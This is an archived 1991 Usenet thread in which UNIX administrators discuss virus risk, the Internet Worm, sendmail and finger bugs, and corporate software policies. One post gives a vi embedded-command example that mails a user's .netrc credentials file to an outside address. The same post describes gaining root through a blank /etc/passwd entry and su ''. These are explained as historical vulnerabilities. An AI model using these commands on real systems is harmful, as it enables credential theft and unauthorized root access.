[comp.unix.admin] Questions about UNIX viruses

dag@esleng.ocunix.on.ca (Dave Gilmour) (04/02/91)

Our company is currently under contract to provide some software to a customer
that is worried that, because our system is connected to the USENET, it could
potentially become infected with a virus and subsequently transmit that virus
to their machine via the delivered software.

Given this, I basically have three questions:

1)	Are viruses a problem on UNIX machines that are connected to the
	net?  We do not accept binary UNIX sources on our machine, so I
	presume that trojans are more likely to be a problem than viruses.

2)	If viruses are out there ready to infect my UNIX machine, is there
	any software that I can run to detect/remove them from my machine?

3)	What steps should I take in order to "reduce the risk" |-)

Any help in the matter will be greatly appreciated. As always, if there is
sufficient interest I will summarize to the net.

Thanks.

System Info : ISC2.2 System V R3.2, Everex Step 386/33

__________________________________________________________________________
David A. Gilmour            |   dag@esleng.ocunix.on.ca
Excalibur Systems Limited   |   uunet!mitel!cunews!micor!esleng!dag
Kanata, Ontario, Canada     |
-- 
__________________________________________________________________________
David A. Gilmour            |   dag@esleng.ocunix.on.ca
Excalibur Systems Limited   |   uunet!mitel!cunews!micor!esleng!dag
Kanata, Ontario, Canada     |

raisch@Control.COM (Robert Raisch) (04/02/91)

dag@esleng.ocunix.on.ca (Dave Gilmour) writes:

>1)	Are viruses a problem on UNIX machines that are connected to the
>	net?  We do not accept binary UNIX sources on our machine, so I
>	presume that trojans are more likely to be a problem than viruses.

Not in my experience.  Though the Internet Worm episode does make a lot
of people edgy.  

It should be noted that the Worm used WELL KNOWN trapdoors and flaws in 
systems software to attack.  Both Sun and Dec were aware of these security
holes as far back as 1980.  Thus it becomes a question of, who is culpable
and how do we get the suppliers of systems software to secure their products?

IMHO, the Worm episode was a good thing.  (*flames >/nev/dull*)

>2)	If viruses are out there ready to infect my UNIX machine, is there
>	any software that I can run to detect/remove them from my machine?

None that I am aware of, though a good network monitoring program can tell
volumes, (if you are conversant in the various net protocols.)

>3)	What steps should I take in order to "reduce the risk" |-)

If you compile a source distribution that you have received from the net
on your machine:

		READ THE SOURCE!!!! 
		UNDERSTAND WHAT IT IS DOING!!!!

An ounce of prevention, blah blah blah.

>Any help in the matter will be greatly appreciated. As always, if there is
>sufficient interest I will summarize to the net.

I felt that this response would be of general interest, thus I posted.

>Thanks.

No prob.
-- 
"I ate his liver with some fava beans and a nice chianti." -Lector

rbraun@spdcc.COM (Rich Braun) (04/03/91)

I have the same problem.  Our company is adding a number of Unix systems to
a large, existing network of DOS systems.  A recent problem with a DOS virus
has some of our management edgy, to the point of asking "why shouldn't we
just isolate the engineering department entirely?"  I do not post directly
from my company, as we have no Internet connection and none is likely unless
I can (a) cost-justify it and (b) come up with solid arguments as to how
I can guarantee system integrity and file security.

If there are any published accounts (books, papers, magazine articles)
available on this subject, I'd love to have them in order to present
better arguments.  Detailed descriptions of past security problems (with
things like TCP/IP, uucp, SCO Unix, ISC, AIX) and how they were resolved
would be real useful.  I personally know that the class of problems under
Unix is vastly different from the "virus" concept of personal computers,
but it's hard to explain to those who aren't familiar with Unix.

A free flow of information is what every engineer wants, and what every
executive fears.

-rich

torek@elf.ee.lbl.gov (Chris Torek) (04/03/91)

In article <1177@cthulhuControl.COM> raisch@Control.COM (Robert Raisch) writes:
>It should be noted that the [Internet] Worm used WELL KNOWN trapdoors and
>flaws in systems software to attack.  Both Sun and Dec were aware of these
>security holes as far back as 1980.

Oh really?  Please produce some evidence to this effect.  Also, for those
of you who knew these so well, why did you not inform Berkeley CSRG?

This is not intended as a flame on Robert Raisch; the rumor that the
finger and sendmail bugs were `well known' goes around regularly, but
seems to have no real grounds.
-- 
In-Real-Life: Chris Torek, Lawrence Berkeley Lab CSE/EE (+1 415 486 5427)
Berkeley, CA		Domain:	torek@ee.lbl.gov

kludge@grissom.larc.nasa.gov ( Scott Dorsey) (04/04/91)

In article <11685@dog.ee.lbl.gov> torek@elf.ee.lbl.gov (Chris Torek) writes:
>This is not intended as a flame on Robert Raisch; the rumor that the
>finger and sendmail bugs were `well known' goes around regularly, but
>seems to have no real grounds.

The sendmail bug at least was well-known (although it's more of an unwanted
feature than a bug).  I at least knew about it in 1987 and got into a good
deal of trouble over it.
--scott

The finger bug, though, that's tricky.

nowicki@legato (Bill Nowicki) (04/06/91)

In article <11685@dog.ee.lbl.gov> torek@elf.ee.lbl.gov (Chris Torek) writes:
>... raisch@Control.COM (Robert Raisch) writes:
>>It should be noted that the [Internet] Worm used WELL KNOWN trapdoors and
>>flaws in systems software to attack.  Both Sun and Dec were aware of these
>>security holes as far back as 1980.
>
>Oh really?  Please produce some evidence to this effect.  

I would like to repeat this request. I was the software engineer
working on sendmail for Sun at the time, and it was news to me.
Although several people claimed to have "known" about the bug, when
pressed for details they got very defensive or changed their story.
Nobody yet has produced any evidence to me that they knew of this bug
before the Worm. If they did know, it was quite unresponsible of them
to not report it to anybody.

Compare this to the people who claimed they "knew" about the 1989
earthquake around here before it happened. Sure.  And if you believe
that....

	Bill Nowicki
	Legato Systems

tr@samadams.princeton.edu (Tom Reingold) (04/08/91)

In article <579@bria> uunet!bria!mike writes:

$ [...]
$ The point I'm making (while being a wise-ass in the process) is that there
$ is no way to truly protect your machine.  If someone wants to do you damage
$ badly enough, they will find a way.  For every security guru out there,
$ there are a dozen 14 year-olds with nothing better to do than make our
$ lives hell.
$ 
$ My personal recommendation is: do what is reasonable (passwords, etc.)
$ and don't worry too much about it.  I don't curse the sky when it rains,
$ either ...

You are right, but missed something.  Someone in the corporation may
make the point, valid or not, that publicizing the existence of an
easy-to-get-to machine or login makes it more vulnerable than a machine
or login that is unknown.  Connecting well is a form of publicity.
Once you're there, people notice.  Posting news makes you much more
noticeable.

I am facing this at my job (which is not at Princeton University).  The
company I work for has a policy of (almost) no internet connections.
Worse, it has a policy that we are not to have any non-company-owned
software on our computers.  This means no software from Usenet.  I
think the goal may be reasonable, but I think the means are not for two
reasons: 1. the policy probably won't work, and 2. it restricts free
exchange of ideas.  The latter, in my belief, affects productivity, so
bottom-line-watchers ought to care about it too.
--
        Tom Reingold
        tr@samadams.princeton.edu  OR  ...!princeton!samadams!tr
        "Warning: Do not drive with Auto-Shade in place.  Remove
        from windshield before starting ignition."

Link_-_APO@cup.portal.com (04/08/91)

Hi,
     I myself just finished reading a new and enlightening book on UNIX system 
security titled "UNIX System Security - How To Protect Your Data and 
Prevent Intruders". Rik Farrow is the author and Addison Wesley is the
publisher.
     For those of you who are flaming about the sendmail and finger
'bugs', the chapter on Communication and Network Security includes
the stories behind those security problems.
-------------------------------------------------------------------------
   ^-^     
  (`|') /) CAE Link Flight        link_apo@cup.portal.com
  /   \//  Sandy Johan	          sun!portal!cup.portal.com!link_apo 
 ( | | )   1077 E. Arques Ave
  \O-O/    Sunnyvale, CA 94088

rbraun@spdcc.COM (Rich Braun) (04/09/91)

uunet!bria!mike writes:
>How to achieve absolute security:
>
>	Never purchase a computer; ...
>
>The point I'm making (while being a wise-ass in the process) is that there
>is no way to truly protect your machine.  If someone wants to do you damage
>badly enough, they will find a way.
>...
>My personal recommendation is: do what is reasonable (passwords, etc.)
>and don't worry too much about it.

This is not particularly helpful advice when trying to justify modems,
Internet connections, electronic mail, etc. to a conservative executive.
A case in point:  Oracle only got its electronic mail systems up and
running within the past year or two.  Their original policy was to
restrict access, for security reasons.  Digital still has a policy of
restricting all Internet communications except those going through a
single bottleneck.

Out in the real world, at real companies, security is still a major
issue.  Telling an executive to "do what is reasonable and don't worry"
just isn't going to give the engineer what he wants:  instant communi-
cations access to other folks who can answer his questions.

Some companies, like BBN, open up the floodgates and allow anyone on
the Net to beat on their software.  That's in their interest, because
they are in the business of selling well-tested network software.  Most
others do not share that level of disregard for data security.

I've gotten a couple of personal e-mail responses letting me know of
published accounts regarding Unix and network security.  One of them is
the June 1990 issue of Unix World, which I'll have to go investigate.

-rich

cjc@ulysses.att.com (Chris Calabrese) (04/09/91)

In article <1991Apr8.062054.11868@newross.Princeton.EDU> tr@samadams.princeton.edu (Tom Reingold) writes:
[ stuff about security by uunet.bria!mike deleted ...]
>
>You are right, but missed something.  Someone in the corporation may
>make the point, valid or not, that publicizing the existence of an
>easy-to-get-to machine or login makes it more vulnerable than a machine
>or login that is unknown.  Connecting well is a form of publicity.
>Once you're there, people notice.  Posting news makes you much more
>noticeable.

One way around this problem is to set aside a machine as a gateway.
This machine can run news, uucp, etc to the outside world and lets in
network traffic from the rest of the sight; however, the rest of the
sight doesn't trust it at all.

That's what happens here.  I read and write news on my desk,
(workstation or X terminal connected to a server), and all the stuff
happens via nntp on our gateway machine.  I can rlogin into the gateway
machine, and I can rcp to and from it from my desk, but once I'm
logged into the gateway machine I can't rlogin out of it or rcp
to/from anywhere.

>I am facing this at my job (which is not at Princeton University).  The
>company I work for has a policy of (almost) no internet connections.
>Worse, it has a policy that we are not to have any non-company-owned
>software on our computers.  This means no software from Usenet.  I
>think the goal may be reasonable, but I think the means are not for two
>reasons: 1. the policy probably won't work, and 2. it restricts free
>exchange of ideas.  The latter, in my belief, affects productivity, so
>bottom-line-watchers ought to care about it too.

I would agree that this is a foolish policy.  I can understand their
security fears, but I believe that the free exchange of ideas is
extremely important in a scientific/engineering community.

As for the no non-company-owned software thing, I would say that this
is almost impossible to enforce in the real world.  The ammount of
useful software that's available publicly is just too great (the MIT X
Windows distribution, GNU software, etc).  Many vendors even ship some
of this stuff with their systems!

A more practical strategy on free software is to openly allow software
posted to the moderated net-news groups, and available on "official"
distributions (the MIT X distribution, the Columbia Kermit
distribution, etc).

After that, you can have a more restrictive policy on other forms of
free software (like stuff from alt.sources); however, even that should
allow that software to make it's way onto the system after the source
has been reviewed by the local guru's (or has been accepted by the
net.community at large).

Most successful attacks on UNIX boxes that I know of have come in
straight through the front door.  Nothing so fancy as net software
that had secret password cracking stuff in assembler coded into the
error messages that got executed if the machine was a Sun.

Just look at the fameous Internet Worm.  Everything it did relied on
bugs in the vendor supplied software, or in shortcomings in the way
people chose their passwords.

Name:			Christopher J. Calabrese
Brain loaned to:	AT&T Bell Laboratories, Murray Hill, NJ
att!ulysses!cjc		cjc@ulysses.att.com
Obligatory Quote:	``pher - gr. vb. to schlep.  phospher - to schlep light.philosopher - to schlep thoughts.''

jc@minya.UUCP (John Chambers) (04/13/91)

In article <2755@legato.Legato.COM>, nowicki@legato (Bill Nowicki) writes:
> In article <11685@dog.ee.lbl.gov> torek@elf.ee.lbl.gov (Chris Torek) writes:
> >... raisch@Control.COM (Robert Raisch) writes:
> >>It should be noted that the [Internet] Worm used WELL KNOWN trapdoors and
> >>flaws in systems software to attack.  Both Sun and Dec were aware of these
> >>security holes as far back as 1980.
> >
> >Oh really?  Please produce some evidence to this effect.  
> I would like to repeat this request. I was the software engineer
> working on sendmail for Sun at the time, and it was news to me.

The sendmail problem I don't  have  any  history  on,  but  there  are
several  other similar problems in Unix utilities for which I can give
examples with dates that show how hard it can be to get the news out.

Back in '83 (just after I moved to Massachusetts, to I know I have the
date right) there was a flurry of dire warnings  on  several  bulletin
boards  concerning  a  new  "feature"  in the vi editor.  This was the
ability of vi to notice  embedded  lines  starting  with  a  ':',  and
interpret  them as vi commands during initial loading of the file.  It
was pointed out  what  could  be  done  by  sending  mail  to  a  user
(especially a super-user) that contained lines like:
	:!mail joe@some.where <$HOME/.netrc
	:-,.d  
This is of course a valuable feature of vi, but it should be  disabled
by  default (as it is now in most releases), so that the user must put
something in $EXINIT or .exrc to enable it.

It  has  been  8  years  since this was widely publicised.  Just a few
months ago I discovered that the vi from one  vendor  still  had  this
feature enabled by default. 8 years! I was tempted to email them a bug
report that did something like the above to illustrate the problem.  I
resisted, and just embedded a command like 
	:!echo "There's a security hole in the vi editor."|mail root $USER
No, I won't tell you which vendor this was.  You should try it on your
system, and if it works, you know what to do.

For another example, it's now been almost exactly  10  years  since  I
learned  about  the problems caused by a blank line in the /etc/passwd
file.  Many vendors have fixed it; others haven't.  For instance, last
year I saw some shocked expressions on the faces of a number of people
at Digital when I asked them to add such a blank line, then typed:
	su '' 
in a non-super-user window and immediately got a '#' prompt.  This was
on some Ultrix 3.1 systems.  Recently, I tried it on some 4.1 systems,
and to my relief it no longer worked.  But it took nearly a decade  to
correct this problem in Ultrix, and it has been know to me and others,
and described in articles like this, over and over and over.

You might try it on your system.  If it doesn't  work,  try  one  more
experiment.   With  the blank line in the password file and after your
entry, change your own password, and then try  the  "su  ''"  command.
Sometimes the blank line itself won't work, but when some user changes
his password, the rest of the /etc/passwd file gets rewritten, and the
blank line becomes:
	::0::::
which is the null-super-user entry that elicits the bug.

10 years!?

How do you get the  word  out?   Both  of  these  problems  have  been
thoroughly  documented on numerous bulletin-boards.  Lots of email has
passed back and forth describing them.   Why  the  #*&%^$&  is  it  so
difficult to correct such problems?

As for sendmail, well, I haven't  followed  the  appropriate  bulletin
boards  to  see  all the warnings that may or may not have been there.
But really, I don't need to.  Just look  around  at  how  sendmail  is
installed. Almost everywhere, it runs as root, talks on TCP port 25 in
ASCII to anyone who knows its language,  requires  no  authentication,
and is capable of running shell commands in response to its input. Add
to that the fact that it is "controlled" by  a  config  file  that  is
poorly understood by all but a handful of experts, and you have a sure
entryway for all sorts of unwanted actions.  I mean, it doesn't take a
genius  to  realize  the  potential.   How  could anyone with even the
slightest understanding of computer security not be suspicious?   What
bigger red flag could there possibly be?

[Well, OK, you could install DOS. ;-]

-- 
All opinions Copyright (c) 1991 by John Chambers.  Inquire for licensing at:
Home: 1-617-484-6393 
Work: 1-508-486-5475
Uucp: ...!{bu.edu,harvard.edu,ima.com,eddie.mit.edu,ora.com}!minya!jc 

jc@minya.UUCP (John Chambers) (04/20/91)

> >I am facing this at my job (which is not at Princeton University).  The
> >company I work for has a policy of (almost) no internet connections.
> >Worse, it has a policy that we are not to have any non-company-owned
> >software on our computers.  This means no software from Usenet.  I
> >think the goal may be reasonable, but I think the means are not for two
> >reasons: 1. the policy probably won't work, and 2. it restricts free
> >exchange of ideas.  The latter, in my belief, affects productivity, so
> >bottom-line-watchers ought to care about it too.
> 
> I would agree that this is a foolish policy.  I can understand their
> security fears, but I believe that the free exchange of ideas is
> extremely important in a scientific/engineering community.

Yeah; this is why historically most scientific advances have come from
government and university researchers, not from corporations.  The few
exceptions  are  mostly places like Bell Labs, and it's hard to make a
convincing argument that AT&T is really a private corporation;  it  is
more  of a government department thinly disguised by a veneer of paper
to make it look legally private.  The Internet arose from the ARPAnet,
which  was  developed  mostly  at  universities (and a few places like
BB&N) with government funding. Sun's NFS was developed at Stanford.  X
windows was developed at MIT (with DEC and IBM funding, true, but with
repeated firm statements by MIT people that *nothing* developed  there
was  proprietary).  Real  advances  require  open  communication among
developers; corporations usually don't even allow this internally.

> Most successful attacks on UNIX boxes that I know of have come in
> straight through the front door.  Nothing so fancy as net software
> that had secret password cracking stuff in assembler coded into the
> error messages that got executed if the machine was a Sun.
> 
> Just look at the fameous Internet Worm.  Everything it did relied on
> bugs in the vendor supplied software, or in shortcomings in the way
> people chose their passwords.

If  you  read any summary of worms/viruses/etc., one thing that really
stands out is that almost all of them take advantage of  the  vendor's
supplied  software.   It's  ironic that almost every manager fears the
public domain stuff, which has almost never been  the  source  of  any
problems, while admitting the off-the-shelf commercial stuff, which is
where the problems usually originate.

This isn't saying that the vendors are at fault, of course. After all,
if  you  were  to  try to implement a virus, and you wanted it spread,
what would you use as a vector?  A public-domain program off  the  net
that  is  recompiled  (and  hacked) by a few thousand programmers on a
wide variety of systems, and who will see your code?   Or  a  vendor's
utility,  which  is delivered in binary form to all of their customers
and installed by someone who hasn't even looked at it? Silly question,
right?

It's especially ironic that there is widespread fear of email and news
links as sources of viruses, when the records show clearly that almost
all  infections  are via swapped disks and tapes that contain doctored
versions of commercial programs.

The perception and the reality here have very little relationship.

-- 
All opinions Copyright (c) 1991 by John Chambers.  Inquire for licensing at:
Home: 1-617-484-6393 
Work: 1-508-486-5475
Uucp: ...!{bu.edu,harvard.edu,ima.com,eddie.mit.edu,ora.com}!minya!jc 

clewis@ferret.ocunix.on.ca (Chris Lewis) (04/23/91)

> >I am facing this at my job (which is not at Princeton University).  The
> >company I work for has a policy of (almost) no internet connections.
> >Worse, it has a policy that we are not to have any non-company-owned
> >software on our computers.  This means no software from Usenet.  I
> >think the goal may be reasonable, but I think the means are not for two
> >reasons: 1. the policy probably won't work, and 2. it restricts free
> >exchange of ideas.  The latter, in my belief, affects productivity, so
> >bottom-line-watchers ought to care about it too.

> I would agree that this is a foolish policy.  I can understand their
> security fears, but I believe that the free exchange of ideas is
> extremely important in a scientific/engineering community.

You may be jumping to conclusions that this is entirely security
related.  There are several other reasons for such a policy:
	- to ensure that they can establish that they are legally entitled
	  to *have* the software in the first place.  More than a few
	  companies have been caught having pirated copies of commercial
	  software.  (and some has accidentally slipped into the net)
	- so there's no arguments as to the ownership of pieces of
	  their own products.  Ie: some company finding out that they can't
	  distribute their product until they negotiate licenses with the
	  originator of a library routine that they used.
	- so that they can maintain some sort of support control over
	  their computer environments.  Ie: finding out that some PD
	  program has infiltrated into being vital to their operations,
	  and then they can't upgrade to a machine that can't run the
	  package.  Management likes knowing their dependencies.
	- Support...
Several major companies have policies that PD is okay, but freeware (copyrighted)
is not.  In some cases these policies are quite justified, for some companies
are frequent targets of "theft of intellectual property" lawsuits for such things.
-- 
Chris Lewis, Phone: (613) 832-0541, Domain: clewis@ferret.ocunix.on.ca
UUCP: ...!cunews!latour!ecicrl!clewis; Ferret Mailing List:
ferret-request@eci386; Psroff (not Adobe Transcript) enquiries:
psroff-request@eci386 or Canada 416-832-0541.  Psroff 3.0 in c.s.u soon!

richardt@legato (Richard Threadgill) (04/25/91)

In article <713@minya.UUCP> jc@minya.UUCP (John Chambers) writes:
>BB&N) with government funding. Sun's NFS was developed at Stanford.  X
>				^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

You are in error, sir.  While Sun's Network Drive protocol may have been
developed at Stanford (I don't know) NFS was most certainly *not.*  NFS 
was entirely developed at Sun, and a number of Sun engineers worked very
hard to persuade corporate that NFS would only be valuable if widely
licensed.

RichardT